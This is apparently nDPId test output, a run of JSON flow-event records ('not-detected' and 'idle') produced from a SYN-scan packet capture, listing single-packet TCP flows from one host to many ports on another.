+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 